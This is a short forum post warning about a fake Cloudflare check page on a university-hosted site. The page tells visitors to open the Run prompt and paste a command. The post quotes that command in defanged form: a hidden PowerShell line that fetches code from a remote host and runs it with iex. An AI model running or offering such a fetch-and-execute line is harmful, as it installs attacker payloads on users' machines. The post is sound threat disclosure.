Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).<p>When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?<p>Win+R (run prompt), Ctrl+V (paste), Enter (execute).<p>What are we executing? This (I replaced . with [DOT]):
powershell -w h "curl bronxy[DOT]cc/sign/in|iex"<p>Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: <a href="https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622458b2a3e0a1897a0379d9bc1b85faf13c1e" rel="nofollow">https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...</a>), but I wonder if the response switches to something malicious sometimes.